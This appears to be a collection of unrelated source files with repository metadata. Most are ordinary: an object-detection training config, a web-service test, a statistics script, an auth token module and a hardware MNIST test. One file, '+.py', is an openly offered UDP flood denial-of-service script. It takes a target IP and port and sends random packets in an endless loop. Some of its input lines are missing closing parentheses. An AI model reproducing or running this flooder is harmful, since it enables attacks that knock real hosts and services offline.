5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432
2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448
2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464
1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480
4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496
3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512
3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528
4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544
4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560
2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576
2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592
5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608
4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624
5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640
4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656
502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672
121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688
1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704
3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720
4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736
1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752
5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768
2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784
2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800
3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816
5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832
1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848
3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864
5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880
1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896
5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912
2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928
3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944
2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960
3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976
3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992
3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008
4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024
803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040
2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056
4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072
3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088
5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104
1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120
5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136
425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152
1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168
479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184
4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200
1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216
4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232
1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248
433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264
3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280
4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296
5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312
938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328
3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344
890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360
2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376
)
| 83.663014 | 245 | 0.732816 |
ace8bfa066a9c6f4f65febf6dd966ee867db460a | 3,123 | py | Python | configs/eftnet/T2_eft53_hmctrd27_whratio03_v1l_2lr_wd3e4_s123_nos_2x.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | configs/eftnet/T2_eft53_hmctrd27_whratio03_v1l_2lr_wd3e4_s123_nos_2x.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | configs/eftnet/T2_eft53_hmctrd27_whratio03_v1l_2lr_wd3e4_s123_nos_2x.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | # model settings
model = dict(
type='CenterNet',
pretrained='./pretrain/darknet53.pth',
backbone=dict(
type='DarknetV3',
layers=[1, 2, 8, 8, 4],
inplanes=[3, 32, 64, 128, 256, 512],
planes=[32, 64, 128, 256, 512, 1024],
norm_cfg=dict(type='BN'),
out_indices=(1, 2, 3, 4),
frozen_stages=1,
norm_eval=False),
neck=dict(type='None'),
bbox_head=dict(
type='CXTHead',
inplanes=(128, 256, 512, 1024),
head_conv=128,
wh_conv=64,
use_deconv=False,
norm_after_upsample=False,
hm_head_conv_num=2,
wh_head_conv_num=2,
ct_head_conv_num=1,
fovea_hm=False,
num_classes=81,
use_exp_wh=False,
wh_offset_base=16,
wh_agnostic=True,
shortcut_cfg=(1, 2, 3),
shortcut_attention=(False, False, False),
norm_cfg=dict(type='BN'),
norm_wh=False,
avg_wh_weightv3=False,
hm_center_ratio=0.27,
center_ratio=0.3,
hm_init_value=None,
giou_weight=5.,
merge_weight=1.,
hm_weight=1.,
ct_weight=1.))
cudnn_benchmark = True
# training and testing settings
train_cfg = dict(
vis_every_n_iters=100,
debug=False)
test_cfg = dict(
score_thr=0.01,
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=12,
workers_per_gpu=4,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(type='SGD', lr=0.002, momentum=0.9, weight_decay=0.0003,
paramwise_options=dict(bias_lr_mult=2., bias_decay_mult=0.))
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 5,
step=[18, 22])
checkpoint_config = dict(save_every_n_steps=200, max_to_keep=1, keep_every_n_epochs=18)
bbox_head_hist_config = dict(
model_type=['ConvModule', 'DeformConvPack'],
sub_modules=['bbox_head'],
save_every_n_steps=200)
# yapf:disable
log_config = dict(interval=20)
# yapf:enable
# runtime settings
total_epochs = 24
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = 'eft53_htct027_whratio3_v1l_2lr_wd3e4_s123_nos_2x'
load_from = None
resume_from = 'work_dirs/1908/0805_T2_eft53_V1L_HMCR027_RATIO3_2LR_AGN_1X/eft53_htct027_whratio3_v1l_2lr_wd3e4_s123_nos_1x_0806_0546/epoch_9.pth'
workflow = [('train', 1)]
| 31.23 | 145 | 0.65578 |
ace8c14e43df670a0df81bcbd48e0000707bd935 | 2,918 | py | Python | test/service/test_repository_projects.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | test/service/test_repository_projects.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | test/service/test_repository_projects.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | from more_itertools import (
one,
)
import requests
from azul.logging import (
configure_test_logging,
)
from service import (
WebServiceTestCase,
)
# noinspection PyPep8Naming
def setUpModule():
configure_test_logging()
class RepositoryProjectsEndpointTest(WebServiceTestCase):
# Set a seed so that we can test the detail response with a stable project ID
seed = 123
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._setup_indices()
@classmethod
def tearDownClass(cls):
cls._teardown_indices()
super().tearDownClass()
def test_projects_response(self):
"""
Verify some basic properties of the /index/projects response and
that each hit in the response is equal to the single hit response of a
a request for one project (eg. /index/projects/{uuid})
"""
def get_response_json(uuid=None):
url = f'{self.base_url}/index/projects/{uuid if uuid else ""}'
response = requests.get(url, params=dict(catalog=self.catalog))
response.raise_for_status()
return response.json()
def assert_file_type_summaries(hit):
self.assertEqual(len(hit['fileTypeSummaries']), 1)
self.assertIn('fileType', hit['fileTypeSummaries'][0])
self.assertGreater(hit['fileTypeSummaries'][0]['count'], 0)
self.assertGreater(hit['fileTypeSummaries'][0]['totalSize'], 0)
hit_properties = {
'protocols',
'entryId',
'projects',
'samples',
'specimens',
'cellLines',
'donorOrganisms',
'organoids',
'cellSuspensions',
'fileTypeSummaries'
}
projects_properties = {
'projectTitle',
'projectShortname',
'laboratory',
'projectDescription',
'contributors',
'publications',
'arrayExpressAccessions',
'geoSeriesAccessions',
'insdcProjectAccessions',
'insdcStudyAccessions',
'supplementaryLinks',
'matrices',
'contributorMatrices'
}
response_json = get_response_json()
self.assertIn('hits', response_json)
self.assertGreater(len(response_json['hits']), 0)
for hit in response_json['hits']:
self.assertEqual(hit_properties, set(hit.keys()))
self.assertEqual(projects_properties, set(one(hit['projects']).keys()))
assert_file_type_summaries(hit)
self.assertNotIn('projectSummary', hit)
self.assertNotIn('files', hit)
single_hit = get_response_json(hit['entryId'])
self.assertEqual(hit, single_hit)
self.assertIn('pagination', response_json)
self.assertIn('termFacets', response_json)
| 31.717391 | 83 | 0.600411 |
ace8c3a046cae9e44527b0db2ebf2d3babfe1fe8 | 1,255 | py | Python | +.py | ArthurAstronot/Delete | 41a1bc5b98e483f32a1e617004751429bd786a51 | [
"BSL-1.0"
] | 1 | 2021-12-05T14:25:56.000Z | 2021-12-05T14:25:56.000Z | +.py | ArthurAstronot/Delete | 41a1bc5b98e483f32a1e617004751429bd786a51 | [
"BSL-1.0"
] | null | null | null | +.py | ArthurAstronot/Delete | 41a1bc5b98e483f32a1e617004751429bd786a51 | [
"BSL-1.0"
] | null | null | null | import sys
import os
import time
import socket
import random
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1200)
##############
os.system("clear")
os.system("figlet DDos Attack")
print ("Author : PheXcReY-Galaxy")
print ("You Tube : https://www.youtube.com/c/PheXcReY-Galaxy")
print ("github : https://github.com/PheXcReY")
print ("Facebook : https://www.facebook.com/ArthurXzz")
ip = str(input("IP Target : ")
port = int(input("Port Target : ")
choice = str(input("Sudah Menyiapkan Virus?(y/n) : ")
times = int(input("Masukan Jumlah Paket Virus : ")
threads = int(input("Masukan Jumlah Kecepatan Virus : ")
os.system("clear")
os.system("figlet Attack Starting")
print ("[ ] 0% ")
time.sleep(5)
print ("[====== ] 25%")
time.sleep(5)
print ("[========== ] 50%")
time.sleep(5)
print ("[=============== ] 75%")
time.sleep(5)
print ("[====================] 100%")
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print(" ============== Mengirim Virus Corona Ke Target Dan Memberikan Permen Lolipop ============ ")
sock.sendto(bytes, (ip,port))
if port == 65534:
port = 1
| 27.282609 | 105 | 0.58008 |
ace8c620cb8a5b1abdc6b6e4c94487ecdaa10a70 | 6,552 | py | Python | scripts/wilcoxon_significance.py | suleymanov/chemprop | 9d21f8810f22794a377a255e3f1f591c93c307dc | [
"MIT"
] | 3 | 2021-11-03T00:46:20.000Z | 2022-01-04T17:50:50.000Z | scripts/wilcoxon_significance.py | suleymanov/chemprop | 9d21f8810f22794a377a255e3f1f591c93c307dc | [
"MIT"
] | 1 | 2020-08-12T05:38:38.000Z | 2020-08-12T05:38:38.000Z | scripts/wilcoxon_significance.py | suleymanov/chemprop | 9d21f8810f22794a377a255e3f1f591c93c307dc | [
"MIT"
] | 2 | 2021-01-23T04:59:14.000Z | 2021-06-03T20:44:08.000Z | from collections import OrderedDict, namedtuple
import os
from typing import List, Optional, Tuple
from typing_extensions import Literal
import numpy as np
from scipy.stats import wilcoxon
from tqdm import tqdm
from tap import Tap # pip install typed-argument-parser (https://github.com/swansonk14/typed-argument-parser)
from chemprop.train.evaluate import evaluate_predictions
from chemprop.utils import mean_absolute_error, rmse, roc_auc_score, prc_auc
FAKE_LOGGER = namedtuple('FakeLogger', ['info'])(info=lambda x: None)
DATASETS = OrderedDict()
DATASETS['qm7'] = {'metric': mean_absolute_error, 'type': 'regression'}
DATASETS['qm8'] = {'metric': mean_absolute_error, 'type': 'regression'}
DATASETS['qm9'] = {'metric': mean_absolute_error, 'type': 'regression'}
DATASETS['delaney'] = {'metric': rmse, 'type': 'regression'}
DATASETS['freesolv'] = {'metric': rmse, 'type': 'regression'}
DATASETS['lipo'] = {'metric': rmse, 'type': 'regression'}
DATASETS['pdbbind_full'] = {'metric': rmse, 'type': 'regression'}
DATASETS['pdbbind_core'] = {'metric': rmse, 'type': 'regression'}
DATASETS['pdbbind_refined'] = {'metric': rmse, 'type': 'regression'}
DATASETS['pcba'] = {'metric': prc_auc, 'type': 'classification'}
DATASETS['muv'] = {'metric': prc_auc, 'type': 'classification'}
DATASETS['hiv'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['bace'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['bbbp'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['tox21'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['toxcast'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['sider'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['clintox'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['chembl'] = {'metric': roc_auc_score, 'type': 'classification'}
# test if 1 is better than 2 (less error, higher auc)
COMPARISONS = [
('default', 'random_forest'),
('default', 'ffn_morgan'),
('default', 'ffn_morgan_count'),
('default', 'ffn_rdkit'),
('features_no_opt', 'default'),
('hyperopt_eval', 'default'),
('hyperopt_ensemble', 'default'),
('hyperopt_eval', 'features_no_opt'),
('hyperopt_ensemble', 'hyperopt_eval'),
('default', 'undirected'),
('default', 'atom_messages'),
('hyperopt_eval', 'compare_lsc_scaffold')
]
EXPERIMENTS = sorted({exp for comp in COMPARISONS for exp in comp})
class Args(Tap):
preds_dir: str # Path to a directory containing predictions
split_type: Literal['random', 'scaffold'] # Split type
def load_preds_and_targets(preds_dir: str,
experiment: str,
dataset: str,
split_type: str) -> Tuple[Optional[np.ndarray],
Optional[np.ndarray]]:
all_preds, all_targets = [], []
num_folds = 0
for fold in range(10):
preds_path = os.path.join(preds_dir, f'417_{experiment}', dataset, split_type, str(fold), 'preds.npy')
targets_path = os.path.join(preds_dir, f'417_{experiment}', dataset, split_type, str(fold), 'targets.npy')
if not (os.path.exists(preds_path) and os.path.exists(targets_path)):
continue
preds = np.load(preds_path)
targets = np.load(targets_path)
all_preds.append(preds)
all_targets.append(targets)
num_folds += 1
if num_folds not in [3, 10]:
print(f'Did not find 3 or 10 preds/targets files for experiment "{experiment}" and dataset "{dataset}" and split type "{split_type}"')
return None, None
all_preds, all_targets = np.concatenate(all_preds, axis=0), np.concatenate(all_targets, axis=0)
assert all_preds.shape == all_targets.shape
return all_preds, all_targets
def compute_values(dataset: str,
preds: List[List[List[float]]],
targets: List[List[List[float]]]) -> List[float]:
num_tasks = len(preds[0][0])
values = [
evaluate_predictions(
preds=pred,
targets=target,
num_tasks=num_tasks,
metric_func=DATASETS[dataset]['metric'],
dataset_type=DATASETS[dataset]['type'],
logger=FAKE_LOGGER
)
for pred, target in tqdm(zip(preds, targets), total=len(preds))
]
values = [np.nanmean(value) for value in values]
return values
def wilcoxon_significance(preds_dir: str, split_type: str):
print('dataset\t' + '\t'.join([f'{exp_1} vs {exp_2}' for exp_1, exp_2 in COMPARISONS]))
for dataset in DATASETS:
dataset_type = DATASETS[dataset]['type']
# Compute values
experiment_to_values = {}
for experiment in EXPERIMENTS:
if experiment == 'compare_lsc_scaffold' and split_type != 'scaffold':
continue
preds, targets = load_preds_and_targets(preds_dir, experiment, dataset, split_type) # num_molecules x num_targets
if preds is None or targets is None:
experiment_to_values[experiment] = None
continue
if dataset_type == 'regression':
preds, targets = [[pred] for pred in preds], [[target] for target in targets]
else:
preds, targets = np.array_split(preds, 30), np.array_split(targets, 30)
values = compute_values(dataset, preds, targets)
experiment_to_values[experiment] = values
print(dataset, end='\t')
# Compute p-values
for experiment_1, experiment_2 in COMPARISONS:
if 'compare_lsc_scaffold' in [experiment_1, experiment_2] and split_type != 'scaffold':
continue
values_1, values_2 = experiment_to_values[experiment_1], experiment_to_values[experiment_2]
if values_1 is None or values_2 is None:
print('Error', end='\t')
continue
assert len(values_1) == len(values_2)
# Remove nans
values_1, values_2 = zip(*[(v_1, v_2) for v_1, v_2 in zip(values_1, values_2) if not (np.isnan(v_1) or np.isnan(v_2))])
# test if error of 1 is less than error of 2
print(wilcoxon(values_1, values_2, alternative='less' if dataset_type == 'regression' else 'greater').pvalue, end='\t')
print()
if __name__ == '__main__':
args = Args().parse_args()
wilcoxon_significance(
preds_dir=args.preds_dir,
split_type=args.split_type,
)
| 37.872832 | 142 | 0.638278 |
ace8c7356129c72faa3276a50a9746a9bef0fcdc | 41 | py | Python | tests/mturk/__init__.py | ericotjo001/neuron-descriptions | 744fbf65c6538edd2fa423108eca7e2cd72f8b59 | [
"MIT"
] | 5 | 2022-02-22T21:58:10.000Z | 2022-03-22T16:19:14.000Z | tests/mturk/__init__.py | ericotjo001/neuron-descriptions | 744fbf65c6538edd2fa423108eca7e2cd72f8b59 | [
"MIT"
] | 3 | 2022-02-27T06:43:34.000Z | 2022-03-18T08:30:30.000Z | tests/mturk/__init__.py | ericotjo001/neuron-descriptions | 744fbf65c6538edd2fa423108eca7e2cd72f8b59 | [
"MIT"
] | 1 | 2022-02-27T05:18:30.000Z | 2022-02-27T05:18:30.000Z | """Unit tests for `src.mturk` module."""
| 20.5 | 40 | 0.634146 |
ace8c7f111e1b0c9ce7d1aae2b3ceffcd9fb2c92 | 3,796 | py | Python | sdks/bkpaas-auth/bkpaas_auth/core/token.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | 1 | 2022-03-03T02:23:00.000Z | 2022-03-03T02:23:00.000Z | sdks/bkpaas-auth/bkpaas_auth/core/token.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | null | null | null | sdks/bkpaas-auth/bkpaas_auth/core/token.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Access token for blueking
"""
import datetime
import logging
from django.utils.timezone import now
from bkpaas_auth.conf import bkauth_settings
from bkpaas_auth.core.constants import ProviderType
from bkpaas_auth.core.exceptions import InvalidTokenCredentialsError, ServiceError
from bkpaas_auth.core.http import http_get
from bkpaas_auth.core.user_info import BkUserInfo, RtxUserInfo, UserInfo
from bkpaas_auth.models import User
logger = logging.getLogger(__name__)
class AbstractRequestBackend:
def request_username(self, **credentials):
"""Get username through credentials"""
class TokenRequestBackend(AbstractRequestBackend):
provider_type = ProviderType.BK
def request_username(self, **credentials):
"""Get username through credentials"""
is_success, resp = http_get(bkauth_settings.USER_COOKIE_VERIFY_URL, params=credentials, timeout=10)
if not is_success:
raise ServiceError('unable to fetch token services')
# API ่ฟๅๆ ผๅผไธบ๏ผ{"result": true, "code": 0, "message": "", "data": {"bk_username": "xxx"}}
if resp.get('code') != 0:
logger.error(
f'Get user fail, url: {bkauth_settings.USER_COOKIE_VERIFY_URL}, '
f'params: {credentials}, response: {resp}'
)
raise InvalidTokenCredentialsError('Invalid credentials given')
return resp["data"]["bk_username"]
class RequestBackend(AbstractRequestBackend):
provider_type = ProviderType.RTX
def request_username(self, **credentials):
"""Get username through credentials"""
is_success, resp = http_get(bkauth_settings.USER_COOKIE_VERIFY_URL, params=credentials, timeout=10)
if not is_success:
raise ServiceError('unable to fetch token services')
# API ่ฟๅๆ ผๅผไธบ๏ผ{"msg": "", "data": {"username": "xxx"}, "ret": 0}
if resp.get('ret') != 0:
logger.error(
f'Get user fail, url: {bkauth_settings.USER_COOKIE_VERIFY_URL}, '
f'params: {credentials}, response: {resp}'
)
raise InvalidTokenCredentialsError('Invalid credentials given')
return resp["data"]["username"]
class LoginToken:
"""Access token object"""
token_timeout_margin = 300
def __init__(self, login_token=None, expires_in=None):
assert login_token, 'Must provide token string'
assert expires_in, 'Must provide expires_in seconds'
self.login_token = login_token
self.expires_at = now() + datetime.timedelta(seconds=expires_in)
self.issued_at = now()
self.user_info = UserInfo(username='AnonymousUser')
def __str__(self):
return 'token: {} expires_at: {}'.format(self.login_token, self.expires_at)
def expired(self):
return self.expires_at < now()
def make_user(self, provider_type):
self.user_info.provider_type = provider_type
return create_user_from_token(self)
def mocked_create_user_from_token(
token: LoginToken, provider_type: int = ProviderType.RTX, username: str = bkauth_settings.MOCKED_USER_NAME
) -> User:
"""Mocked create_user function, only for temporary use"""
if provider_type == ProviderType.RTX:
token.user_info = RtxUserInfo(
LoginName=username,
ChineseName=username,
)
elif provider_type == ProviderType.BK:
token.user_info = BkUserInfo(bk_username=username, chname=username, email='', phone='')
else:
raise ValueError('Invalid provider_type given.')
return create_user_from_token(token)
def create_user_from_token(token: LoginToken) -> User:
"""Create a user object from user info dict"""
user = User(token=token)
return token.user_info.provide(user)
| 35.148148 | 110 | 0.682561 |
ace8ca5d9945dec979e1e5f10f1d8bd6401be1d7 | 27 | py | Python | visvmtagger/__init__.py | kanjirz50/viet-morphological-analysis-svm | 7535a56cc0a63342bda14f39abbca1161e8cb93c | [
"MIT"
] | 7 | 2016-03-26T13:12:16.000Z | 2019-10-26T04:31:14.000Z | visvmtagger/__init__.py | kanjirz50/viet-morphological-analysis-svm | 7535a56cc0a63342bda14f39abbca1161e8cb93c | [
"MIT"
] | 3 | 2016-05-29T09:13:13.000Z | 2017-02-27T05:27:09.000Z | visvmtagger/__init__.py | kanjirz50/viet-morphological-analysis-svm | 7535a56cc0a63342bda14f39abbca1161e8cb93c | [
"MIT"
] | 7 | 2016-03-30T03:35:52.000Z | 2019-10-26T04:31:17.000Z | from .tagger import Tagger
| 13.5 | 26 | 0.814815 |
ace8cab4374e8a3c1ad3fb01a2d39fca8a6c2132 | 4,537 | py | Python | test/test_mnist/test_mnist.py | pgfarley/deep-learning-fpga | 1ceb6334c3d0640fa26e1337cffb61fda9ec24ec | [
"MIT"
] | 1 | 2018-11-15T07:58:54.000Z | 2018-11-15T07:58:54.000Z | test/test_mnist/test_mnist.py | pgfarley/deep-learning-fpga | 1ceb6334c3d0640fa26e1337cffb61fda9ec24ec | [
"MIT"
] | 5 | 2018-10-29T06:50:38.000Z | 2018-10-29T09:42:11.000Z | test/test_mnist/test_mnist.py | pgfarley/deep-learning-fpga | 1ceb6334c3d0640fa26e1337cffb61fda9ec24ec | [
"MIT"
] | null | null | null | import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge, ReadOnly
from cocotb.binary import BinaryValue
from cocotb.result import TestFailure
import os
import struct
import math
import numpy as np
import sklearn as sk
import sklearn.neural_network
from binstr import bytes_to_b
def should_equal(expected, actual, epsilon=0):
if (abs(expected - actual) > epsilon):
raise TestFailure(
f'Expected {expected} found {actual}. Exceeds epsilon of {epsilon}'
)
@cocotb.coroutine
def reset(dut):
dut.reset_n = 0
yield RisingEdge(dut.clk)
dut.reset_n = 1
dut.in_en = 0
yield RisingEdge(dut.clk)
@cocotb.coroutine
def load_weights(dut, weights):
yield RisingEdge(dut.clk)
dut.weights_en = 1
for weights_idx, weights in enumerate(weights):
dut.weights_layer_address = weights_idx
for n_idx, n in enumerate(weights):
dut.weights_n_address = n_idx
for m_idx, m in enumerate(n):
dut.weights_m_address = m_idx
dut.weights_data = int(m * math.pow(2, 16))
yield RisingEdge(dut.clk)
dut.weights_en = 0
yield RisingEdge(dut.clk)
@cocotb.test()
def mnist_predict_1(dut):
cocotb.fork(Clock(dut.clk, 2).start())
nn = sk.neural_network.MLPRegressor(
# nn = sk.neural_network.MLPClassifier(
activation='relu',
hidden_layer_sizes=(10,)
)
with open("mnist/train-images.idx3-ubyte", "rb") as image_file:
with open("mnist/train-labels.idx1-ubyte", "rb") as label_file:
_, image_count, height, width = struct.unpack(
'>iiii',
image_file.read(16)
)
_, label_count = struct.unpack('>ii', label_file.read(8))
image_data = np.array(
struct.unpack(
f"{width*height*image_count}B",
image_file.read(width * height*image_count)
)
).reshape(image_count, width*height)
label_data = np.array(
struct.unpack(
f"{label_count}B",
label_file.read(image_count)
)
).reshape(-1,)
nn.fit(image_data, label_data)
weights = [
np.insert(nn.coefs_[0], 0, nn.intercepts_[0], axis=0),
np.insert(nn.coefs_[1], 0, nn.intercepts_[1], axis=0)
]
print(weights)
print(np.array(weights).shape)
print(np.array(weights[0]).shape)
print(np.array(weights[1]).shape)
yield reset(dut)
yield load_weights(dut, weights)
with open("mnist/t10k-images.idx3-ubyte", "rb") as image_file:
with open("mnist/t10k-labels.idx1-ubyte", "rb") as label_file:
_, image_count, height, width = struct.unpack(
'>iiii',
image_file.read(16)
)
_, label_count = struct.unpack('>ii', label_file.read(8))
image_data = np.array(
struct.unpack(
f"{width*height*image_count}B",
image_file.read(width * height*image_count)
)
).reshape(image_count, width*height)
label_data = np.array(
struct.unpack(
f"{label_count}B",
label_file.read(image_count)
)
).reshape(-1,)
prediction = nn.predict(image_data[1].reshape(1,image_data.shape[1]))
print(label_data[1])
print(prediction)
with open("mnist/t10k-images.idx3-ubyte", "rb") as image_file:
_ = image_file.read(16)
data = image_file.read(784)
input_data = BinaryValue()
input_data.binstr = bytes_to_b(data)
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print(input_data.buff)
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
dut.in_data = input_data
dut.in_en = 1
yield RisingEdge(dut.out_en)
yield ReadOnly()
should_equal(
prediction[0],
dut.out_data.value.signed_integer / math.pow(2, 16),
epsilon=0.01)
print(dut.out_data.value.signed_integer / math.pow(2, 16))
print(dut.out_data)
print(prediction[0])
print(prediction[0] - dut.out_data.value.signed_integer / math.pow(2, 16))
| 30.246667 | 86 | 0.549262 |
ace8cb8de8f6e2d6e8f80477abd5200064e53cb1 | 6,969 | py | Python | pyrox/portcullis/crypto_filter.py | jfwood/pyrox | 5963d4a89cb795aba777f960e9ceba7ff2244bd2 | [
"MIT"
] | 1 | 2020-04-07T10:15:07.000Z | 2020-04-07T10:15:07.000Z | pyrox/portcullis/crypto_filter.py | jfwood/pyrox | 5963d4a89cb795aba777f960e9ceba7ff2244bd2 | [
"MIT"
